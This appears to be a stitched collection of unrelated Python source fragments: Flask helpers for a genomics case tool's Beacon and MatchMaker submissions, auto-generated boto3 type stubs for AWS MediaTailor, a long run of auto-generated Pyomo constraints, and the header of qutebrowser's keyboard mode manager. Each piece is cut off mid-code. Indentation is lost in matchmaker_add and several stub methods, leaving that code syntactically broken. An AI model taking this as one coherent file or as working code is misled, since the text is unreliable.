        store: database adapter
        institute_id (str): institute id
        case_name (str): case display name
        individual_id (str): id of the individual on the case

    Returns:
        tuple: (display_name, vcf2cytosure file path) for the individual

    Raises:
        ValueError: if no individual with the given id exists on the case.
    """
    institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
    for individual in case_obj["individuals"]:
        if individual["individual_id"] == individual_id:
            return (individual["display_name"], individual["vcf2cytosure"])
    # Previously an unknown id fell through the loop and raised an opaque
    # NameError on the unbound local; fail with a clear message instead.
    raise ValueError(f"Individual {individual_id} not found in case {case_name}")
def multiqc(store, institute_id, case_name):
    """Find MultiQC report for the case.

    Returns:
        dict: institute and case objects for rendering the MultiQC view.
    """
    institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
    return dict(institute=institute_obj, case=case_obj)
def prepare_beacon_req_params():
    """Prepares URL and Headers for sending a request to the beacon server.

    Returns:
        url, headers (tuple), or None when BEACON_URL / BEACON_TOKEN are
        missing from the app config.
    """
    req_url = current_app.config.get("BEACON_URL")
    beacon_token = current_app.config.get("BEACON_TOKEN")
    if not req_url or not beacon_token:
        return None
    # Copy the shared header template: assigning and then mutating
    # JSON_HEADERS directly would write the auth token into the
    # module-level dict shared by every other request.
    req_headers = dict(JSON_HEADERS)
    req_headers["X-Auth-Token"] = beacon_token
    return req_url, req_headers
def beacon_remove(case_id):
    """Remove all variants from a case in Beacon by handling a POST request to the /apiv1.0/delete Beacon endpoint.

    Args:
        case_id(str): A case _id
    """
    # Resolve URL/headers once instead of calling the helper twice.
    req_params = prepare_beacon_req_params()
    if req_params is None:
        flash(
            "Please check config file. It should contain both BEACON_URL and BEACON_TOKEN",
            "warning",
        )
        return
    request_url, req_headers = req_params

    case_obj = store.case(case_id=case_id)
    beacon_submission = case_obj.get("beacon")
    if beacon_submission is None:
        flash("Couldn't find a valid beacon submission for this case", "warning")
        return

    # Prepare beacon request data
    assembly = "GRCh37" if "37" in str(case_obj["genome_build"]) else "GRCh38"
    dataset_id = "_".join([case_obj["owner"], assembly])
    samples = list(beacon_submission.get("samples", []))
    data = {"dataset_id": dataset_id, "samples": samples}

    resp = delete_request_json("/".join([request_url, "delete"]), req_headers, data)
    flash_color = "success"
    message = resp.get("content", {}).get("message")
    if resp.get("status_code") == 200:
        # Deletion succeeded: drop the submission record from the case.
        store.case_collection.update_one({"_id": case_obj["_id"]}, {"$unset": {"beacon": 1}})
    else:
        flash_color = "warning"
    flash(f"Beacon responded:{message}", flash_color)
def beacon_add(form):
    """Save variants from one or more case samples to the Beacon server.
    Handle a POST request to the /apiv1.0/add Beacon endpoint

    Args:
        form(werkzeug.datastructures.ImmutableMultiDict): beacon submission form
    """
    # Resolve URL/headers once instead of calling the helper twice.
    req_params = prepare_beacon_req_params()
    if req_params is None:
        flash(
            "Please check config file. It should contain both BEACON_URL and BEACON_TOKEN",
            "warning",
        )
        return
    request_url, req_headers = req_params

    case_obj = store.case(case_id=form.get("case"))
    # define case individuals (individual_id, same as in VCF) to filter VCF files with
    if form.get("samples") == "affected":
        # NOTE(review): phenotype == 2 presumably marks affected individuals
        # (PED nomenclature) — confirm against the case model.
        individuals = [
            ind["individual_id"] for ind in case_obj["individuals"] if ind["phenotype"] == 2
        ]
    else:
        individuals = [ind["individual_id"] for ind in case_obj["individuals"]]

    # define genes to filter VCF files with
    gene_filter = set()
    for panel in form.getlist("panels"):
        gene_filter.update(store.panel_to_genes(panel_id=panel, gene_format="hgnc_id"))
    gene_filter = list(gene_filter)

    # Record of this submission, persisted on the case after uploads succeed.
    submission = {
        "created_at": datetime.datetime.now(),
        "user": current_user.email,
        "samples": individuals,
        "panels": form.getlist("panels"),
        "vcf_files": [],
    }

    # Prepare beacon request data
    assembly = "GRCh37" if "37" in str(case_obj["genome_build"]) else "GRCh38"
    data = {
        "dataset_id": "_".join([case_obj["owner"], assembly]),
        "samples": individuals,
        "assemblyId": assembly,
    }
    if gene_filter:  # Gene filter is not mandatory
        data["genes"] = {"ids": gene_filter, "id_type": "HGNC"}

    # loop over selected VCF files and send an add request to Beacon for each one of them
    vcf_files = form.getlist("vcf_files")
    if not vcf_files:
        flash("Please select at least one VCF file to save to Beacon", "warning")
        return
    for vcf_key in vcf_files:
        data["vcf_path"] = case_obj["vcf_files"].get(vcf_key)
        resp = post_request_json("/".join([request_url, "add"]), data, req_headers)
        if resp.get("status_code") != 200:
            flash(f"Beacon responded:{resp.get('content',{}).get('message')}", "warning")
            continue
        submission["vcf_files"].append(vcf_key)

    if submission["vcf_files"]:
        flash(
            f"Variants from the following files are going to be saved to Beacon:{submission['vcf_files']}",
            "success",
        )
        store.case_collection.find_one_and_update(
            {"_id": case_obj["_id"]}, {"$set": {"beacon": submission}}
        )
    return
def matchmaker_check_requirements(request):
    """Make sure requirements are fulfilled before submitting any request to MatchMaker Exchange

    Args:
        request(werkzeug.local.LocalProxy)

    Returns:
        None, if requirements are fulfilled, otherwise redirects to previous page with error message
    """
    # Make sure all MME connection parameters are available in scout instance.
    # BUG FIX: the previous check was `any([...]) is None`, which can never be
    # true because any() returns a bool — missing parameters went undetected.
    if not all(hasattr(matchmaker, attr) for attr in ("host", "accept", "token")):
        flash(
            "An error occurred reading matchmaker connection parameters. Please check config file!",
            "danger",
        )
        return redirect(request.referrer)
    # Check that request comes from an authorized user (mme_submitter role)
    user_obj = store.user(current_user.email)
    if "mme_submitter" not in user_obj.get("roles", []):
        flash("unauthorized request", "warning")
        return redirect(request.referrer)
    # NOTE(review): callers must check the return value — a returned redirect
    # is otherwise silently ignored.
def matchmaker_add(request, institute_id, case_name):
"""Add all affected individuals from a case to a MatchMaker server
Args:
request(werkzeug.local.LocalProxy)
institute_id(str): _id of an institute
case_name(str): display name of a case
"""
# Check that general MME request requirements are fulfilled
matchmaker_check_requirements(request)
_, case_obj = institute_and_case(store, institute_id, case_name)
candidate_vars = request.form.getlist("selected_var")
if len(candidate_vars) > 3:
flash(
"At the moment it is not possible to save to MatchMaker more than 3 candidate variants / genes",
"warning",
)
return redirect(request.referrer)
save_gender = "sex" in request.form
features = (
hpo_terms(case_obj)
if "features" in request.form and case_obj.get("phenotype_terms")
else []
)
disorders = omim_terms(case_obj) if "disorders" in request.form else []
genes_only = request.form.get("genomicfeatures") == "genes"
if not features and not candidate_vars:
flash(
"In order to upload a case to MatchMaker you need to pin a variant or at least assign a phenotype (HPO term)",
"danger",
)
return redirect(request.referrer)
# create contact dictionary
user_obj = store.user(current_user.email)
contact_info = {
"name": user_obj["name"],
"href": "".join(["mailto:", user_obj["email"]]),
"institution": "Scout software user, Science For Life Laboratory, Stockholm, Sweden",
}
submitted_info = {
"contact": contact_info,
"sex": save_gender,
"features": features,
"disorders": disorders,
"genes_only": genes_only,
"patient_id": [],
"server_responses": [],
}
server_responses = []
n_updated = 0
for individual in case_obj.get("individuals"):
if not individual["phenotype"] in [
2,
"affected",
]: # include only affected individuals
continue
patient = {
"contact": contact_info,
"id": ".".join(
[case_obj["_id"], individual.get("individual_id")]
), # This is a required field form MME
"label": ".".join([case_obj["display_name"], individual.get("display_name")]),
"features": features,
"disorders": disorders,
}
| |
<reponame>cowboygneox/boto3_type_annotations<gh_stars>100-1000
from typing import Optional
from botocore.client import BaseClient
from typing import Dict
from botocore.paginate import Paginator
from botocore.waiter import Waiter
from typing import Union
from typing import List
class Client(BaseClient):
    # Auto-generated type-annotation stub: signature and docs only, no logic.
    # Return annotation added per the documented True/False contract.
    def can_paginate(self, operation_name: str = None) -> bool:
        """
        Check if an operation can be paginated.
        :type operation_name: string
        :param operation_name: The operation name. This is the same name
        as the method name on the client. For example, if the
        method name is ``create_foo``, and you\'d normally invoke the
        operation as ``client.create_foo(**kwargs)``, if the
        ``create_foo`` operation can be paginated, you can use the
        call ``client.get_paginator(\"create_foo\")``.
        :return: ``True`` if the operation can be paginated,
        ``False`` otherwise.
        """
        pass
def delete_playback_configuration(self, Name: str) -> Dict:
"""
Deletes the playback configuration for the specified name.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/mediatailor-2018-04-23/DeletePlaybackConfiguration>`_
**Request Syntax**
::
response = client.delete_playback_configuration(
Name='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
The request was successful and there is no content in the response.
:type Name: string
:param Name: **[REQUIRED]**
The identifier for the playback configuration.
:rtype: dict
:returns:
"""
pass
    # Auto-generated type-annotation stub: signature and docs only, no logic.
    def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None):
        """
        Generate a presigned url given a client, its method, and arguments
        :type ClientMethod: string
        :param ClientMethod: The client method to presign for
        :type Params: dict
        :param Params: The parameters normally passed to
        ``ClientMethod``.
        :type ExpiresIn: int
        :param ExpiresIn: The number of seconds the presigned url is valid
        for. By default it expires in an hour (3600 seconds)
        :type HttpMethod: string
        :param HttpMethod: The http method to use on the generated url. By
        default, the http method is whatever is used in the method\'s model.
        :returns: The presigned url
        """
        pass
    # Auto-generated type-annotation stub: signature and docs only, no logic.
    def get_paginator(self, operation_name: str = None) -> Paginator:
        """
        Create a paginator for an operation.
        :type operation_name: string
        :param operation_name: The operation name. This is the same name
        as the method name on the client. For example, if the
        method name is ``create_foo``, and you\'d normally invoke the
        operation as ``client.create_foo(**kwargs)``, if the
        ``create_foo`` operation can be paginated, you can use the
        call ``client.get_paginator(\"create_foo\")``.
        :raise OperationNotPageableError: Raised if the operation is not
        pageable. You can use the ``client.can_paginate`` method to
        check if an operation is pageable.
        :rtype: L{botocore.paginate.Paginator}
        :return: A paginator object.
        """
        pass
def get_playback_configuration(self, Name: str) -> Dict:
"""
Returns the playback configuration for the specified name.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/mediatailor-2018-04-23/GetPlaybackConfiguration>`_
**Request Syntax**
::
response = client.get_playback_configuration(
Name='string'
)
**Response Syntax**
::
{
'AdDecisionServerUrl': 'string',
'CdnConfiguration': {
'AdSegmentUrlPrefix': 'string',
'ContentSegmentUrlPrefix': 'string'
},
'DashConfiguration': {
'ManifestEndpointPrefix': 'string',
'MpdLocation': 'string',
'OriginManifestType': 'SINGLE_PERIOD'|'MULTI_PERIOD'
},
'HlsConfiguration': {
'ManifestEndpointPrefix': 'string'
},
'Name': 'string',
'PlaybackConfigurationArn': 'string',
'PlaybackEndpointPrefix': 'string',
'SessionInitializationEndpointPrefix': 'string',
'SlateAdUrl': 'string',
'Tags': {
'string': 'string'
},
'TranscodeProfileName': 'string',
'VideoContentSourceUrl': 'string'
}
**Response Structure**
- *(dict) --*
Success.
- **AdDecisionServerUrl** *(string) --*
The URL for the ad decision server (ADS). This includes the specification of static parameters and placeholders for dynamic parameters. AWS Elemental MediaTailor substitutes player-specific and session-specific parameters as needed when calling the ADS. Alternately, for testing, you can provide a static VAST URL. The maximum length is 25,000 characters.
- **CdnConfiguration** *(dict) --*
The configuration for using a content delivery network (CDN), like Amazon CloudFront, for content and ad segment management.
- **AdSegmentUrlPrefix** *(string) --*
A non-default content delivery network (CDN) to serve ad segments. By default, AWS Elemental MediaTailor uses Amazon CloudFront with default cache settings as its CDN for ad segments. To set up an alternate CDN, create a rule in your CDN for the following origin: ads.mediatailor.<region>.amazonaws.com. Then specify the rule's name in this AdSegmentUrlPrefix. When AWS Elemental MediaTailor serves a manifest, it reports your CDN as the source for ad segments.
- **ContentSegmentUrlPrefix** *(string) --*
A content delivery network (CDN) to cache content segments, so that content requests don’t always have to go to the origin server. First, create a rule in your CDN for the content segment origin server. Then specify the rule's name in this ContentSegmentUrlPrefix. When AWS Elemental MediaTailor serves a manifest, it reports your CDN as the source for content segments.
- **DashConfiguration** *(dict) --*
The configuration for DASH content.
- **ManifestEndpointPrefix** *(string) --*
The URL generated by MediaTailor to initiate a playback session. The session uses server-side reporting. This setting is ignored in PUT operations.
- **MpdLocation** *(string) --*
The setting that controls whether MediaTailor includes the Location tag in DASH manifests. MediaTailor populates the Location tag with the URL for manifest update requests, to be used by players that don't support sticky redirects. Disable this if you have CDN routing rules set up for accessing MediaTailor manifests, and you are either using client-side reporting or your players support sticky HTTP redirects. Valid values are DISABLED and EMT_DEFAULT. The EMT_DEFAULT setting enables the inclusion of the tag and is the default value.
- **OriginManifestType** *(string) --*
The setting that controls whether MediaTailor handles manifests from the origin server as multi-period manifests or single-period manifests. If your origin server produces single-period manifests, set this to SINGLE_PERIOD. The default setting is MULTI_PERIOD. For multi-period manifests, omit this setting or set it to MULTI_PERIOD.
- **HlsConfiguration** *(dict) --*
The configuration for HLS content.
- **ManifestEndpointPrefix** *(string) --*
The URL that is used to initiate a playback session for devices that support Apple HLS. The session uses server-side reporting.
- **Name** *(string) --*
The identifier for the playback configuration.
- **PlaybackConfigurationArn** *(string) --*
The Amazon Resource Name (ARN) for the playback configuration.
- **PlaybackEndpointPrefix** *(string) --*
The URL that the player accesses to get a manifest from AWS Elemental MediaTailor. This session will use server-side reporting.
- **SessionInitializationEndpointPrefix** *(string) --*
The URL that the player uses to initialize a session that uses client-side reporting.
- **SlateAdUrl** *(string) --*
The URL for a high-quality video asset to transcode and use to fill in time that's not used by ads. AWS Elemental MediaTailor shows the slate to fill in gaps in media content. Configuring the slate is optional for non-VPAID playback configurations. For VPAID, the slate is required because MediaTailor provides it in the slots designated for dynamic ad content. The slate must be a high-quality asset that contains both audio and video.
- **Tags** *(dict) --*
The tags assigned to the playback configuration.
- *(string) --*
- *(string) --*
- **TranscodeProfileName** *(string) --*
The name that is used to associate this playback configuration with a custom transcode profile. This overrides the dynamic transcoding defaults of MediaTailor. Use this only if you have already set up custom profiles with the help of AWS Support.
- **VideoContentSourceUrl** *(string) --*
The URL prefix for the master playlist for the stream, minus the asset ID. The maximum length is 512 characters.
:type Name: string
:param Name: **[REQUIRED]**
The identifier for the playback configuration.
:rtype: dict
:returns:
"""
pass
    # Auto-generated type-annotation stub: signature and docs only, no logic.
    def get_waiter(self, waiter_name: str = None) -> Waiter:
        """
        Returns an object that can wait for some condition.
        :type waiter_name: str
        :param waiter_name: The name of the waiter to get. See the waiters
        section of the service docs for a list of available waiters.
        :returns: The specified waiter object.
        :rtype: botocore.waiter.Waiter
        """
        pass
def list_playback_configurations(self, MaxResults: int = None, NextToken: str = None) -> Dict:
"""
Returns a list of the playback configurations defined in AWS Elemental MediaTailor. You can specify a maximum number of configurations to return at a time. The default maximum is 50. Results are returned in pagefuls. If MediaTailor has more configurations than the specified maximum, it provides parameters in the response that you can use to retrieve the next pageful. | |
- m.x105)*m.x507) + m.x506) == 0)
# Auto-generated Pyomo constraint definitions (c306..c360). Each constraint
# couples consecutive variables x507..x562 through the implicit recurrence
#   x[j+1] - (0.0025*(u[i]*(y[i] - 10*x[j]) - (1 - u[i])*x[j]
#             + u[i+1]*(y[i+1] - 10*x[j+1]) - (1 - u[i+1])*x[j+1]) + x[j]) == 0
# where u = x105..x160 and y = x306..x361 in this index window.
# Machine-generated model code — do not edit by hand.
m.c306 = Constraint(expr=m.x508 - (0.0025*(m.x105*(m.x306 - 10*m.x507) - (1 - m.x105)*m.x507 + m.x106*(m.x307 - 10*
m.x508) - (1 - m.x106)*m.x508) + m.x507) == 0)
m.c307 = Constraint(expr=m.x509 - (0.0025*(m.x106*(m.x307 - 10*m.x508) - (1 - m.x106)*m.x508 + m.x107*(m.x308 - 10*
m.x509) - (1 - m.x107)*m.x509) + m.x508) == 0)
m.c308 = Constraint(expr=m.x510 - (0.0025*(m.x107*(m.x308 - 10*m.x509) - (1 - m.x107)*m.x509 + m.x108*(m.x309 - 10*
m.x510) - (1 - m.x108)*m.x510) + m.x509) == 0)
m.c309 = Constraint(expr=m.x511 - (0.0025*(m.x108*(m.x309 - 10*m.x510) - (1 - m.x108)*m.x510 + m.x109*(m.x310 - 10*
m.x511) - (1 - m.x109)*m.x511) + m.x510) == 0)
m.c310 = Constraint(expr=m.x512 - (0.0025*(m.x109*(m.x310 - 10*m.x511) - (1 - m.x109)*m.x511 + m.x110*(m.x311 - 10*
m.x512) - (1 - m.x110)*m.x512) + m.x511) == 0)
m.c311 = Constraint(expr=m.x513 - (0.0025*(m.x110*(m.x311 - 10*m.x512) - (1 - m.x110)*m.x512 + m.x111*(m.x312 - 10*
m.x513) - (1 - m.x111)*m.x513) + m.x512) == 0)
m.c312 = Constraint(expr=m.x514 - (0.0025*(m.x111*(m.x312 - 10*m.x513) - (1 - m.x111)*m.x513 + m.x112*(m.x313 - 10*
m.x514) - (1 - m.x112)*m.x514) + m.x513) == 0)
m.c313 = Constraint(expr=m.x515 - (0.0025*(m.x112*(m.x313 - 10*m.x514) - (1 - m.x112)*m.x514 + m.x113*(m.x314 - 10*
m.x515) - (1 - m.x113)*m.x515) + m.x514) == 0)
m.c314 = Constraint(expr=m.x516 - (0.0025*(m.x113*(m.x314 - 10*m.x515) - (1 - m.x113)*m.x515 + m.x114*(m.x315 - 10*
m.x516) - (1 - m.x114)*m.x516) + m.x515) == 0)
m.c315 = Constraint(expr=m.x517 - (0.0025*(m.x114*(m.x315 - 10*m.x516) - (1 - m.x114)*m.x516 + m.x115*(m.x316 - 10*
m.x517) - (1 - m.x115)*m.x517) + m.x516) == 0)
m.c316 = Constraint(expr=m.x518 - (0.0025*(m.x115*(m.x316 - 10*m.x517) - (1 - m.x115)*m.x517 + m.x116*(m.x317 - 10*
m.x518) - (1 - m.x116)*m.x518) + m.x517) == 0)
m.c317 = Constraint(expr=m.x519 - (0.0025*(m.x116*(m.x317 - 10*m.x518) - (1 - m.x116)*m.x518 + m.x117*(m.x318 - 10*
m.x519) - (1 - m.x117)*m.x519) + m.x518) == 0)
m.c318 = Constraint(expr=m.x520 - (0.0025*(m.x117*(m.x318 - 10*m.x519) - (1 - m.x117)*m.x519 + m.x118*(m.x319 - 10*
m.x520) - (1 - m.x118)*m.x520) + m.x519) == 0)
m.c319 = Constraint(expr=m.x521 - (0.0025*(m.x118*(m.x319 - 10*m.x520) - (1 - m.x118)*m.x520 + m.x119*(m.x320 - 10*
m.x521) - (1 - m.x119)*m.x521) + m.x520) == 0)
m.c320 = Constraint(expr=m.x522 - (0.0025*(m.x119*(m.x320 - 10*m.x521) - (1 - m.x119)*m.x521 + m.x120*(m.x321 - 10*
m.x522) - (1 - m.x120)*m.x522) + m.x521) == 0)
m.c321 = Constraint(expr=m.x523 - (0.0025*(m.x120*(m.x321 - 10*m.x522) - (1 - m.x120)*m.x522 + m.x121*(m.x322 - 10*
m.x523) - (1 - m.x121)*m.x523) + m.x522) == 0)
m.c322 = Constraint(expr=m.x524 - (0.0025*(m.x121*(m.x322 - 10*m.x523) - (1 - m.x121)*m.x523 + m.x122*(m.x323 - 10*
m.x524) - (1 - m.x122)*m.x524) + m.x523) == 0)
m.c323 = Constraint(expr=m.x525 - (0.0025*(m.x122*(m.x323 - 10*m.x524) - (1 - m.x122)*m.x524 + m.x123*(m.x324 - 10*
m.x525) - (1 - m.x123)*m.x525) + m.x524) == 0)
m.c324 = Constraint(expr=m.x526 - (0.0025*(m.x123*(m.x324 - 10*m.x525) - (1 - m.x123)*m.x525 + m.x124*(m.x325 - 10*
m.x526) - (1 - m.x124)*m.x526) + m.x525) == 0)
m.c325 = Constraint(expr=m.x527 - (0.0025*(m.x124*(m.x325 - 10*m.x526) - (1 - m.x124)*m.x526 + m.x125*(m.x326 - 10*
m.x527) - (1 - m.x125)*m.x527) + m.x526) == 0)
m.c326 = Constraint(expr=m.x528 - (0.0025*(m.x125*(m.x326 - 10*m.x527) - (1 - m.x125)*m.x527 + m.x126*(m.x327 - 10*
m.x528) - (1 - m.x126)*m.x528) + m.x527) == 0)
m.c327 = Constraint(expr=m.x529 - (0.0025*(m.x126*(m.x327 - 10*m.x528) - (1 - m.x126)*m.x528 + m.x127*(m.x328 - 10*
m.x529) - (1 - m.x127)*m.x529) + m.x528) == 0)
m.c328 = Constraint(expr=m.x530 - (0.0025*(m.x127*(m.x328 - 10*m.x529) - (1 - m.x127)*m.x529 + m.x128*(m.x329 - 10*
m.x530) - (1 - m.x128)*m.x530) + m.x529) == 0)
m.c329 = Constraint(expr=m.x531 - (0.0025*(m.x128*(m.x329 - 10*m.x530) - (1 - m.x128)*m.x530 + m.x129*(m.x330 - 10*
m.x531) - (1 - m.x129)*m.x531) + m.x530) == 0)
m.c330 = Constraint(expr=m.x532 - (0.0025*(m.x129*(m.x330 - 10*m.x531) - (1 - m.x129)*m.x531 + m.x130*(m.x331 - 10*
m.x532) - (1 - m.x130)*m.x532) + m.x531) == 0)
m.c331 = Constraint(expr=m.x533 - (0.0025*(m.x130*(m.x331 - 10*m.x532) - (1 - m.x130)*m.x532 + m.x131*(m.x332 - 10*
m.x533) - (1 - m.x131)*m.x533) + m.x532) == 0)
m.c332 = Constraint(expr=m.x534 - (0.0025*(m.x131*(m.x332 - 10*m.x533) - (1 - m.x131)*m.x533 + m.x132*(m.x333 - 10*
m.x534) - (1 - m.x132)*m.x534) + m.x533) == 0)
m.c333 = Constraint(expr=m.x535 - (0.0025*(m.x132*(m.x333 - 10*m.x534) - (1 - m.x132)*m.x534 + m.x133*(m.x334 - 10*
m.x535) - (1 - m.x133)*m.x535) + m.x534) == 0)
m.c334 = Constraint(expr=m.x536 - (0.0025*(m.x133*(m.x334 - 10*m.x535) - (1 - m.x133)*m.x535 + m.x134*(m.x335 - 10*
m.x536) - (1 - m.x134)*m.x536) + m.x535) == 0)
m.c335 = Constraint(expr=m.x537 - (0.0025*(m.x134*(m.x335 - 10*m.x536) - (1 - m.x134)*m.x536 + m.x135*(m.x336 - 10*
m.x537) - (1 - m.x135)*m.x537) + m.x536) == 0)
m.c336 = Constraint(expr=m.x538 - (0.0025*(m.x135*(m.x336 - 10*m.x537) - (1 - m.x135)*m.x537 + m.x136*(m.x337 - 10*
m.x538) - (1 - m.x136)*m.x538) + m.x537) == 0)
m.c337 = Constraint(expr=m.x539 - (0.0025*(m.x136*(m.x337 - 10*m.x538) - (1 - m.x136)*m.x538 + m.x137*(m.x338 - 10*
m.x539) - (1 - m.x137)*m.x539) + m.x538) == 0)
m.c338 = Constraint(expr=m.x540 - (0.0025*(m.x137*(m.x338 - 10*m.x539) - (1 - m.x137)*m.x539 + m.x138*(m.x339 - 10*
m.x540) - (1 - m.x138)*m.x540) + m.x539) == 0)
m.c339 = Constraint(expr=m.x541 - (0.0025*(m.x138*(m.x339 - 10*m.x540) - (1 - m.x138)*m.x540 + m.x139*(m.x340 - 10*
m.x541) - (1 - m.x139)*m.x541) + m.x540) == 0)
m.c340 = Constraint(expr=m.x542 - (0.0025*(m.x139*(m.x340 - 10*m.x541) - (1 - m.x139)*m.x541 + m.x140*(m.x341 - 10*
m.x542) - (1 - m.x140)*m.x542) + m.x541) == 0)
m.c341 = Constraint(expr=m.x543 - (0.0025*(m.x140*(m.x341 - 10*m.x542) - (1 - m.x140)*m.x542 + m.x141*(m.x342 - 10*
m.x543) - (1 - m.x141)*m.x543) + m.x542) == 0)
m.c342 = Constraint(expr=m.x544 - (0.0025*(m.x141*(m.x342 - 10*m.x543) - (1 - m.x141)*m.x543 + m.x142*(m.x343 - 10*
m.x544) - (1 - m.x142)*m.x544) + m.x543) == 0)
m.c343 = Constraint(expr=m.x545 - (0.0025*(m.x142*(m.x343 - 10*m.x544) - (1 - m.x142)*m.x544 + m.x143*(m.x344 - 10*
m.x545) - (1 - m.x143)*m.x545) + m.x544) == 0)
m.c344 = Constraint(expr=m.x546 - (0.0025*(m.x143*(m.x344 - 10*m.x545) - (1 - m.x143)*m.x545 + m.x144*(m.x345 - 10*
m.x546) - (1 - m.x144)*m.x546) + m.x545) == 0)
m.c345 = Constraint(expr=m.x547 - (0.0025*(m.x144*(m.x345 - 10*m.x546) - (1 - m.x144)*m.x546 + m.x145*(m.x346 - 10*
m.x547) - (1 - m.x145)*m.x547) + m.x546) == 0)
m.c346 = Constraint(expr=m.x548 - (0.0025*(m.x145*(m.x346 - 10*m.x547) - (1 - m.x145)*m.x547 + m.x146*(m.x347 - 10*
m.x548) - (1 - m.x146)*m.x548) + m.x547) == 0)
m.c347 = Constraint(expr=m.x549 - (0.0025*(m.x146*(m.x347 - 10*m.x548) - (1 - m.x146)*m.x548 + m.x147*(m.x348 - 10*
m.x549) - (1 - m.x147)*m.x549) + m.x548) == 0)
m.c348 = Constraint(expr=m.x550 - (0.0025*(m.x147*(m.x348 - 10*m.x549) - (1 - m.x147)*m.x549 + m.x148*(m.x349 - 10*
m.x550) - (1 - m.x148)*m.x550) + m.x549) == 0)
m.c349 = Constraint(expr=m.x551 - (0.0025*(m.x148*(m.x349 - 10*m.x550) - (1 - m.x148)*m.x550 + m.x149*(m.x350 - 10*
m.x551) - (1 - m.x149)*m.x551) + m.x550) == 0)
m.c350 = Constraint(expr=m.x552 - (0.0025*(m.x149*(m.x350 - 10*m.x551) - (1 - m.x149)*m.x551 + m.x150*(m.x351 - 10*
m.x552) - (1 - m.x150)*m.x552) + m.x551) == 0)
m.c351 = Constraint(expr=m.x553 - (0.0025*(m.x150*(m.x351 - 10*m.x552) - (1 - m.x150)*m.x552 + m.x151*(m.x352 - 10*
m.x553) - (1 - m.x151)*m.x553) + m.x552) == 0)
m.c352 = Constraint(expr=m.x554 - (0.0025*(m.x151*(m.x352 - 10*m.x553) - (1 - m.x151)*m.x553 + m.x152*(m.x353 - 10*
m.x554) - (1 - m.x152)*m.x554) + m.x553) == 0)
m.c353 = Constraint(expr=m.x555 - (0.0025*(m.x152*(m.x353 - 10*m.x554) - (1 - m.x152)*m.x554 + m.x153*(m.x354 - 10*
m.x555) - (1 - m.x153)*m.x555) + m.x554) == 0)
m.c354 = Constraint(expr=m.x556 - (0.0025*(m.x153*(m.x354 - 10*m.x555) - (1 - m.x153)*m.x555 + m.x154*(m.x355 - 10*
m.x556) - (1 - m.x154)*m.x556) + m.x555) == 0)
m.c355 = Constraint(expr=m.x557 - (0.0025*(m.x154*(m.x355 - 10*m.x556) - (1 - m.x154)*m.x556 + m.x155*(m.x356 - 10*
m.x557) - (1 - m.x155)*m.x557) + m.x556) == 0)
m.c356 = Constraint(expr=m.x558 - (0.0025*(m.x155*(m.x356 - 10*m.x557) - (1 - m.x155)*m.x557 + m.x156*(m.x357 - 10*
m.x558) - (1 - m.x156)*m.x558) + m.x557) == 0)
m.c357 = Constraint(expr=m.x559 - (0.0025*(m.x156*(m.x357 - 10*m.x558) - (1 - m.x156)*m.x558 + m.x157*(m.x358 - 10*
m.x559) - (1 - m.x157)*m.x559) + m.x558) == 0)
m.c358 = Constraint(expr=m.x560 - (0.0025*(m.x157*(m.x358 - 10*m.x559) - (1 - m.x157)*m.x559 + m.x158*(m.x359 - 10*
m.x560) - (1 - m.x158)*m.x560) + m.x559) == 0)
m.c359 = Constraint(expr=m.x561 - (0.0025*(m.x158*(m.x359 - 10*m.x560) - (1 - m.x158)*m.x560 + m.x159*(m.x360 - 10*
m.x561) - (1 - m.x159)*m.x561) + m.x560) == 0)
m.c360 = Constraint(expr=m.x562 - (0.0025*(m.x159*(m.x360 - 10*m.x561) - (1 - m.x159)*m.x561 + m.x160*(m.x361 - 10*
m.x562) - (1 - m.x160)*m.x562) + m.x561) == 0)
m.c361 = Constraint(expr=m.x563 - (0.0025*(m.x160*(m.x361 - 10*m.x562) - (1 - | |
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2014-2021 <NAME> (The Compiler) <<EMAIL>>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <https://www.gnu.org/licenses/>.
"""Mode manager (per window) which handles the current keyboard mode."""
import functools
import dataclasses
from typing import Mapping, Callable, MutableMapping, Union, Set, cast
from PyQt5.QtCore import pyqtSlot, pyqtSignal, Qt, QObject, QEvent
from PyQt5.QtGui import QKeyEvent
from qutebrowser.commands import runners
from qutebrowser.keyinput import modeparsers, basekeyparser
from qutebrowser.config import config
from qutebrowser.api import cmdutils
from qutebrowser.utils import usertypes, log, objreg, utils
from qutebrowser.browser import hints
from qutebrowser.misc import objects
# Modes whose keyparsers pass unbound keys through to the page/widget.
INPUT_MODES = [usertypes.KeyMode.insert, usertypes.KeyMode.passthrough]
# Modes used while a prompt is shown to the user.
PROMPT_MODES = [usertypes.KeyMode.prompt, usertypes.KeyMode.yesno]
# Type of the KeyMode -> keyparser mapping built in init().
ParserDictType = MutableMapping[usertypes.KeyMode, basekeyparser.BaseKeyParser]
@dataclasses.dataclass(frozen=True)
class KeyEvent:

    """A small wrapper over a QKeyEvent storing its data.

    This is needed because Qt apparently mutates existing events with new data.
    It doesn't store the modifiers because they can be different for a key
    press/release.

    Attributes:
        key: A Qt.Key member (QKeyEvent::key).
        text: A string (QKeyEvent::text).
    """

    key: Qt.Key
    text: str

    @classmethod
    def from_event(cls, event: QKeyEvent) -> 'KeyEvent':
        """Initialize a KeyEvent from a QKeyEvent.

        Copies the key code and text out immediately, since Qt may mutate the
        event object afterwards (see class docstring).
        """
        return cls(Qt.Key(event.key()), event.text())
class NotInModeError(Exception):

    """Exception raised when we want to leave a mode we're not in."""

    # NOTE(review): presumably raised by ModeManager.leave — confirm there.
class UnavailableError(Exception):

    """Exception raised when trying to access modeman before initialization.

    Thrown by instance() if modeman has not been initialized yet.
    """

    # Raised by the module-level instance() function below.
def init(win_id: int, parent: QObject) -> 'ModeManager':
    """Initialize the mode manager and the keyparsers for the given win_id.

